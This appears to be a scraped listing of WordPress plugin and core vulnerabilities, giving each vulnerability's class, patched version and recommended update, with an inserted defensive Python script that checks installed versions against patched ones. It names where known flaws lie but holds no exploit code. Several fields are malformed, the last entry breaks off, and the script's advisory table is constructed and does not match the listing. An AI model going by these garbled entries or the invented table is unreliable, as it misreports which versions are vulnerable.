Plugin: SupportCandy – Helpdesk & Customer Support Ticket System

Vulnerability: Unauthenticated SQL Injection via parse_user_filters
Patched Version: 3.1.5
Recommended Action: Update to version 3.1.5, or a newer patched version

Plugin: Schema & Structured Data for WP & AMP

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.26
Recommended Action: Update to version 1.26, or a newer patched version

Plugin: WPForms – Easy Form Builder for WordPress – Contact Forms, Payment Forms, Surveys, & More

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.4.8
Recommended Action: Update to version 1.4.8, or a newer patched version

Plugin: Bulk NoIndex & NoFollow Toolkit

Vulnerability: Missing Authorization
Patched Version: 1.51
Recommended Action: Update to version 1.51, or a newer patched version

Plugin: Newsletters

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.6.5.3
Recommended Action: Update to version 4.6.5.3, or a newer patched version

Plugin: Converter for Media – Optimize images | Convert WebP & AVIF

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: WP User Groups

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: FOX – Currency Switcher Professional for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 1.3.9.4
Recommended Action: Update to version 1.3.9.4, or a newer patched version

Plugin: WooCommerce

Vulnerability: Path Traversal via Tax Importer
Patched Version: 6.2.1
Recommended Action: Update to version 6.2.1, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Open Redirect
Patched Version: 1.8.8
Recommended Action: Update to version 1.8.8, or a newer patched version

Plugin: WP Database Backup – Unlimited Database & Files Backup by Backup for WP

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 5.9
Recommended Action: Update to version 5.9, or a newer patched version

Plugin: Front End Users

Vulnerability: Missing Authorization to Unauthenticated Registered User Deletion
Patched Version: 3.2.25
Recommended Action: Update to version 3.2.25, or a newer patched version

Plugin: Rich Reviews by Starfish

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.15
Recommended Action: Update to version 1.9.15, or a newer patched version

Plugin: Client Invoicing by Sprout Invoices – Easy Estimates and Invoices for WordPress

Vulnerability: Missing Authorization
Patched Version: 9.4
Recommended Action: Update to version 9.4, or a newer patched version

Plugin: WP Job Portal – A Complete Recruitment System for Company or Job Board website

Vulnerability: Missing Authorization to Settings Modification
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Olevmedia Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Opal Estate

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Authorization Bypass
Patched Version: 3.7.32
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.32, 3.8.32, 3.9.30, 4.0.29, 4.1.29, 4.2.26, 4.3.22, 4.4.21, 4.5.20, 4.6.17, 4.7.16, 4.8.12, 4.9.13, 5.0.8, 5.1.4, 5.2.5, 5.3.1
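
Every entry in this listing reduces to the same decision: compare the installed version with the patched version and update, or, where the listing says no patch exists, mitigate or remove. The script below is an added example, not code from the original page or from any of the listed projects; it automates that comparison over the JSON that `wp plugin list --format=json` prints. The slug-to-advisory table, the slugs themselves and the sample inventory are constructed for illustration: the listing names plugins by display title, so the slug mapping is an assumption to verify against your own site. It also handles two cases a naive check gets wrong: a plugin listed several times with different patched versions (such as Photo Gallery by 10Web above), where the installed version must clear every entry, and the WordPress core entry directly above, which lists one fix per release branch, so an installed 4.9.x is safe at 4.9.13 even though 5.3.1 is the newest number.

```python
"""Version check of a WordPress site against an advisory listing.

Added example, not code from the original page. Assumes the JSON shape of
`wp plugin list --format=json` ("name" = plugin slug, "version" = installed
version). The ADVISORIES slug mapping and the sample inventory below are
constructed for illustration.
"""
import json

# One list per plugin slug; each element is one advisory entry, given as a
# tuple of patched versions. An empty tuple means "No patched version
# available". More than one version in a tuple means one fix per release
# branch (the WordPress core entry), not alternatives to choose from.
# Slugs are assumed here; the listing names plugins by display title.
ADVISORIES = {
    "elementor": [("3.18.2",)],
    "contact-form-7": [("5.8.4",)],
    "photo-gallery": [("1.5.23",), ("1.2.11",), ("1.8.8",), ("1.6.3",)],
    "mail-masta": [()],
}
CORE_FIXES = ("3.7.32", "3.8.32", "3.9.30", "4.0.29", "4.1.29", "4.2.26",
              "4.3.22", "4.4.21", "4.5.20", "4.6.17", "4.7.16", "4.8.12",
              "4.9.13", "5.0.8", "5.1.4", "5.2.5", "5.3.1")

SEVERITY = {"patched": 0, "vulnerable": 1, "no-fix": 2}


def parse_version(v):
    """'1.2.10' -> (1, 2, 10); non-digit suffixes are dropped, so
    '2.1-beta' compares as (2, 1)."""
    parts = []
    for piece in v.split("."):
        digits = "".join(ch for ch in piece if ch.isdigit())
        parts.append(int(digits) if digits else 0)
    return tuple(parts)


def version_ge(installed, fixed):
    """Numeric, component-wise comparison with zero padding, so
    '1.8' equals '1.8.0' and '1.10' is newer than '1.9'."""
    a, b = parse_version(installed), parse_version(fixed)
    width = max(len(a), len(b))
    return a + (0,) * (width - len(a)) >= b + (0,) * (width - len(b))


def entry_status(installed, fixed_versions):
    """Status of one installed version against one advisory entry."""
    if not fixed_versions:
        return "no-fix"
    if len(fixed_versions) == 1:
        return "patched" if version_ge(installed, fixed_versions[0]) else "vulnerable"
    # Per-branch fixes: compare against the fix for the installed major.minor.
    branch = parse_version(installed)[:2]
    for fixed in fixed_versions:
        if parse_version(fixed)[:2] == branch:
            return "patched" if version_ge(installed, fixed) else "vulnerable"
    # Branch not listed: safe only if newer than the newest fixed branch.
    newest = max(fixed_versions, key=parse_version)
    return "patched" if version_ge(installed, newest) else "vulnerable"


def check_core(installed):
    """Status of a WordPress core version against the per-branch fix list."""
    return entry_status(installed, CORE_FIXES)


def check_plugins(plugin_list_json, advisories=ADVISORIES):
    """Worst status per installed plugin that appears in the advisory table.
    Inactive plugins are checked too: their files are still on disk."""
    installed = {p["name"]: p["version"] for p in json.loads(plugin_list_json)}
    report = {}
    for slug, version in installed.items():
        if slug not in advisories:
            continue
        statuses = [entry_status(version, fixed) for fixed in advisories[slug]]
        report[slug] = max(statuses, key=SEVERITY.__getitem__)
    return report


# Constructed sample in the shape `wp plugin list --format=json` emits.
SAMPLE_PLUGIN_LIST = json.dumps([
    {"name": "elementor", "status": "active", "update": "available", "version": "3.18.1"},
    {"name": "contact-form-7", "status": "active", "update": "none", "version": "5.8.4"},
    {"name": "photo-gallery", "status": "active", "update": "available", "version": "1.6.3"},
    {"name": "mail-masta", "status": "inactive", "update": "none", "version": "1.0"},
    {"name": "akismet", "status": "active", "update": "none", "version": "5.3"},
])

if __name__ == "__main__":
    for slug, status in sorted(check_plugins(SAMPLE_PLUGIN_LIST).items()):
        print(f"{slug:20} {status}")
    print(f"{'wordpress core':20} {check_core('4.9.12')}")
```

On a real site, replace SAMPLE_PLUGIN_LIST with the output of `wp plugin list --format=json` and `check_core` with the value of `wp core version`. A "no-fix" result means the listing's advice applies: weigh mitigations against your risk tolerance, and treat uninstalling the plugin as the default. Note that "update" being "none" in the WP-CLI output is not evidence of safety; a plugin that has been removed from the directory reports no update even when a vulnerable version is installed.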

Plugin: PDF Invoices & Packing Slips for WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.13
Recommended Action: Update to version 2.0.13, or a newer patched version

Plugin: Category Grid View Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Preloader for Website

Vulnerability: Missing Authorization via plwao_register_settings()
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: OG Tags

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Optimize Database after Deleting Revisions

Vulnerability: Cross-Site Request Forgery via ‘odb_csv_download’
Patched Version: 5.1
Recommended Action: Update to version 5.1, or a newer patched version

Plugin: Login with WHMCS

Vulnerability: Authentication Bypass
Patched Version: 1.11.4
Recommended Action: Update to version 1.11.4, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated (Author+) SQL Injection via cg_activate and cg_deactivate
Patched Version: 19.1.5
Recommended Action: Update to version 19.1.5, or a newer patched version

Plugin: Popup Builder – Create highly converting, mobile friendly marketing popups.

Vulnerability: Local File Inclusion and PHAR Deserialization
Patched Version: 4.0.7
Recommended Action: Update to version 4.0.7, or a newer patched version

Plugin: Trade Runner

Vulnerability: Cross-Site Scripting
Patched Version: 3.10
Recommended Action: Update to version 3.10, or a newer patched version

Plugin: WPS Hide Login

Vulnerability: Login Page Disclosure via ‘action=rp’
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: WP Tiles

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: OAuth Single Sign On – SSO (OAuth Client)

Vulnerability: Missing Authorization
Patched Version: 6.23.4
Recommended Action: Update to version 6.23.4, or a newer patched version

Plugin: Cookie Consent, Consent Log, Cookie Scanner, Script Blocker (for GDPR, CCPA & ePrivacy) : WP Cookie Consent

Vulnerability: Authenticated (Administrator+) CSV Injection
Patched Version: 2.2.6
Recommended Action: Update to version 2.2.6, or a newer patched version

Plugin: Redirection

Vulnerability: Cross-Site Request Forgery via ‘statusBulkEdit’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: SQL Injection
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: Retain Live Chat

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Import any XML, CSV or Excel File to WordPress

Vulnerability: Admin+ Malicious File Upload
Patched Version: 3.6.8
Recommended Action: Update to version 3.6.8, or a newer patched version

Plugin: M Chart

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.10
Recommended Action: Update to version 1.10, or a newer patched version

Plugin: Mollie Payments for WooCommerce

Vulnerability: Authenticated (Shop Manager+) Arbitrary File Upload
Patched Version: 7.3.12
Recommended Action: Update to version 7.3.12, or a newer patched version

Plugin: Admin Block Country

Vulnerability: Cross-Site Request Forgery via admin_block_country_initial_page
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Floating Notification Bar, Sticky Menu on Scroll, Announcement Banner, and Sticky Header for Any Theme – My Sticky Bar (formerly myStickymenu)

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: Multi Step Form

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.7.8
Recommended Action: Update to version 1.7.8, or a newer patched version

Plugin: Psychological tests & quizzes

Vulnerability: Authenticated (Contributor+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: AdSense-Deluxe

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Send Users Email – Email Subscribers, Email Marketing Newsletter

Vulnerability: Sensitive Information Exposure via Error Logs
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: Contact Form 7 Connector

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.14
Recommended Action: Update to version 1.1.14, or a newer patched version

Plugin: Login | Login Page | Login Logo | Rename Login Page | Custom Login Page | Temporary Users | Rebrand Login | Login Captcha

Vulnerability: Not specified in this listing (affected version: 1.1.1)
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Piwik PRO

Vulnerability: Arbitrary File Upload
Patched Version: 0.4.4
Recommended Action: Update to version 0.4.4, or a newer patched version

Plugin: Interactive Image Map Plugin – Draw Attention

Vulnerability: Improper Access Control via register_cpt
Patched Version: 2.0.16
Recommended Action: Update to version 2.0.16, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Stored Cross-Site Scripting via $custom_profile
Patched Version: 4.1.3.2
Recommended Action: Update to version 4.1.3.2, or a newer patched version

Plugin: Stock market charts from finviz

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: 404 SEO Redirection

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Core: WordPress

Vulnerability: HTML File Upload
Patched Version: 3.6.1
Recommended Action: Update to version 3.6.1, or a newer patched version

Plugin: smart-slider-2

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.12
Recommended Action: Update to version 2.3.12, or a newer patched version

Plugin: Tracked Tweets

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Alert Before Your Post

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: BuddyPress

Vulnerability: 7.0.0
Patched Version: 7.2.1
Recommended Action: Update to version 7.2.1, or a newer patched version

Plugin: Contact Form 7

Vulnerability: Authenticated (Editor+) Arbitrary File Upload
Patched Version: 5.8.4
Recommended Action: Update to version 5.8.4, or a newer patched version

Plugin: WonderPlugin Audio Player

Vulnerability: Blind SQL Injection
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Advanced Youtube Channel Pagination

Vulnerability: Cross-Site Request Forgery to Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Cloud Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ND Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 7.0
Recommended Action: Update to version 7.0, or a newer patched version

Plugin: Migration, Backup, Staging – WPvivid Backup & Migration

Vulnerability: Authenticated (Administrator+) Arbitrary Directory Deletion via Path Traversal
Patched Version: 0.9.90
Recommended Action: Update to version 0.9.90, or a newer patched version

Plugin: Testimonials

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Cart66 Lite :: WordPress Ecommerce

Vulnerability: WordPress Ecommerce < 1.5.4
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: Cart2Cart: Magento to WooCommerce Migration

Vulnerability: Missing Authorization via setToken
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Testimonial Slider

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Advanced Menu Widget

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Shortcodes Plugin — Shortcodes Ultimate

Vulnerability: Authenticated (Subscriber+) Arbitrary File Read via Shortcode
Patched Version: 5.12.7
Recommended Action: Update to version 5.12.7, or a newer patched version

Plugin: BadgeOS

Vulnerability: Authenticated (Subscriber+) Insecure Direct Object Reference to Arbitrary Post Title Overwrite
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Missing Authorization
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: Sync QCloud COS

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: Forms by CaptainForm – Form Builder for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Addons for Contact Form 7

Vulnerability: Authenticated (Subscriber+) SQL Injection via id
Patched Version: 3.1.24
Recommended Action: Update to version 3.1.24, or a newer patched version

Plugin: Popup by Supsystic

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.7.9
Recommended Action: Update to version 1.7.9, or a newer patched version

Plugin: Highlight Searched Terms in Results

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.04
Recommended Action: Update to version 1.04, or a newer patched version

Plugin: WikiPop

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Social Slider

Vulnerability: SQL Injection
Patched Version: 7.4.2
Recommended Action: Update to version 7.4.2, or a newer patched version

Plugin: 10WebAnalytics

Vulnerability: Missing Authorization via gawd_wd_bp_install_notice_status
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GC Testimonials

Vulnerability: Authenticated (Contributor+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Migration, Backup, Staging – WPvivid Backup & Migration

Vulnerability: Authenticated (Admin+) Directory Traversal
Patched Version: 0.9.76
Recommended Action: Update to version 0.9.76, or a newer patched version

Plugin: Image Hover Effects Ultimate (Image Gallery, Effects, Lightbox, Comparison or Magnifier)

Vulnerability: Authenticated Stored Cross-Site Scripting via Video Link
Patched Version: 9.8.0
Recommended Action: Update to version 9.8.0, or a newer patched version

Plugin: Gallery Blocks with Lightbox. Image Gallery, (HTML5 video , YouTube, Vimeo) Video Gallery and Lightbox for native gallery

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: WP Comment Remix

Vulnerability: SQL Injection
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: Child Theme Generator

Vulnerability: No subtitle
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: DecaLog

Vulnerability: Cross-Site Request Forgery via get_settings_page
Patched Version: 3.7.1
Recommended Action: Update to version 3.7.1, or a newer patched version

Plugin: Login With Ajax – Fast Logins, 2FA, Redirects

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: YOP Poll

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 6.2.8
Recommended Action: Update to version 6.2.8, or a newer patched version

Plugin: LoginPress | wp-login Custom Login Page Customizer

Vulnerability: Reflected Cross-Site Scripting via redirect-page Parameter
Patched Version: 1.5.12
Recommended Action: Update to version 1.5.12, or a newer patched version

Plugin: digg-digg

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.3.5
Recommended Action: Update to version 5.3.5, or a newer patched version

Plugin: Visitors Online by BestWebSoft

Vulnerability: SQL Injection
Patched Version: 0.4
Recommended Action: Update to version 0.4, or a newer patched version

Plugin: rtMedia for WordPress, BuddyPress and bbPress

Vulnerability: Missing Authorization to Settings Update
Patched Version: 4.6.15
Recommended Action: Update to version 4.6.15, or a newer patched version

Plugin: eRoom – Zoom Meetings & Webinars

Vulnerability: Missing Authorization via stm_wpcfto_get_settings_callback
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: WPS Limit Login

Vulnerability: Authorization Bypass via IP Spoofing
Patched Version: 1.4.6.1
Recommended Action: Update to version 1.4.6.1, or a newer patched version

Plugin: Fast Secure Contact Form

Vulnerability: Cross-Site Scripting
Patched Version: 4.0.38
Recommended Action: Update to version 4.0.38, or a newer patched version

Plugin: Translate WordPress with GTranslate

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting via Multiple Parameters
Patched Version: 3.0.4
Recommended Action: Update to version 3.0.4, or a newer patched version

Plugin: LearnDash LMS

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.1.6
Recommended Action: Update to version 3.1.6, or a newer patched version

Plugin: Captcha Them All

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Property Hive

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.15
Recommended Action: Update to version 1.4.15, or a newer patched version

Plugin: WP Affiliate Disclosure

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via $id
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Unauthenticated Stored Cross-Site Scripting via IP
Patched Version: 13.1.6
Recommended Action: Update to version 13.1.6, or a newer patched version

Plugin: Download Manager

Vulnerability: Remote Code Execution
Patched Version: 2.7.5
Recommended Action: Update to version 2.7.5, or a newer patched version

Plugin: Video Metabox

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Team Members

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 5.0.4
Recommended Action: Update to version 5.0.4, or a newer patched version

Plugin: WP Time Slots Booking Form

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1.63
Recommended Action: Update to version 1.1.63, or a newer patched version

Plugin: Custom 404 Pro

Vulnerability: Reflected Cross-Site Scripting via ‘s’
Patched Version: 3.7.3
Recommended Action: Update to version 3.7.3, or a newer patched version

Plugin: iPanorama 360 – Advanced Virtual Tour Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6.22
Recommended Action: Update to version 1.6.22, or a newer patched version

Plugin: Unify

Vulnerability: Cross-Site Scripting
Patched Version: 3.3.0
Recommended Action: Update to version 3.3.0, or a newer patched version

Plugin: Simply Excerpts

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More

Vulnerability: Authenticated Authorization Bypass and Privilege Escalation
Patched Version: 6.6.2
Recommended Action: Update to version 6.6.2, or a newer patched version

Plugin: ShopConstruct – Product Catalog, Shopping Cart and eCommerce solution for Store

Vulnerability: Reflected Cross-Site Scripting via multiple parameters
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Unauthorized Image File Upload
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.42
Recommended Action: Update to version 1.2.42, or a newer patched version

Plugin: Social Proof Popups & Real-Time Notifications – Herd Effects

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 5.2.3
Recommended Action: Update to version 5.2.3, or a newer patched version

Plugin: StreamCast – Radio Player for WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: EU Cookie Law for GDPR/CCPA

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Masteriyo LMS – eLearning and Online Course Builder for WordPress

Vulnerability: LMS for WordPress <= 1.6.7
Patched Version: 1.6.8
Recommended Action: Update to version 1.6.8, or a newer patched version

Plugin: Export All Posts, Products, Orders, Refunds & Users

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: Sniplets

Vulnerability: Remote File Inclusion
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Enhanced WP Contact Form

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: WordPress GDPR

Vulnerability: No subtitle
Patched Version: 1.9.27
Recommended Action: Update to version 1.9.27, or a newer patched version

Plugin: Essential Real Estate

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.9.6
Recommended Action: Update to version 3.9.6, or a newer patched version

Plugin: Quards

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: SQL Injection
Patched Version: 4.1.8
Recommended Action: Update to version 4.1.8, or a newer patched version

Plugin: Contact Form 7 Database Addon – CFDB7

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.2.6.2
Recommended Action: Update to version 1.2.6.2, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.25.3
Recommended Action: Update to version 2.25.3, or a newer patched version

Plugin: Complianz Premium – GDPR/CCPA Cookie Consent

Vulnerability: SQL Injection via Translations
Patched Version: 6.3.6
Recommended Action: Update to version 6.3.6, or a newer patched version

Plugin: Advanced Custom Fields (ACF)

Vulnerability: PHP Object Injection
Patched Version: 5.7.12
Recommended Action: Update to version 5.7.12, or a newer patched version

Plugin: Számlázz.hu integráció WooCommerce-hez

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.6.3.3
Recommended Action: Update to version 5.6.3.3, or a newer patched version

Plugin: Temporary Login Without Password

Vulnerability: Subscriber+ Plugin Settings Update
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: eCommerce Product Catalog Plugin for WordPress

Vulnerability: No subtitle
Patched Version: 3.0.39
Recommended Action: Update to version 3.0.39, or a newer patched version

Plugin: AutomatorWP – Automator plugin for no-code automations, webhooks & custom integrations in WordPress

Vulnerability: Cross-Site Request Forgery via bulk_delete
Patched Version: 2.5.9
Recommended Action: Update to version 2.5.9, or a newer patched version

Plugin: Comments Extra Fields For Post,Pages and CPT

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 4.1
Recommended Action: Update to version 4.1, or a newer patched version

Plugin: PixelYourSite Pro – Your smart PIXEL (TAG) Manager

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 9.6.2
Recommended Action: Update to version 9.6.2, or a newer patched version

Plugin: Redirection for Contact Form 7

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Plugin: CAOS | Host Google Analytics Locally

Vulnerability: Missing Authorization to Unauthenticated Plugin Settings Update
Patched Version: 4.7.15
Recommended Action: Update to version 4.7.15, or a newer patched version

Plugin: E2Pdf – Export Pdf Tool for WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.20.20
Recommended Action: Update to version 1.20.20, or a newer patched version

Plugin: Easy Author Image

Vulnerability: Email Information Exposure
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: Post Indexer

Vulnerability: Authenticated (Super Admin+) SQL Injection
Patched Version: 3.0.6.2
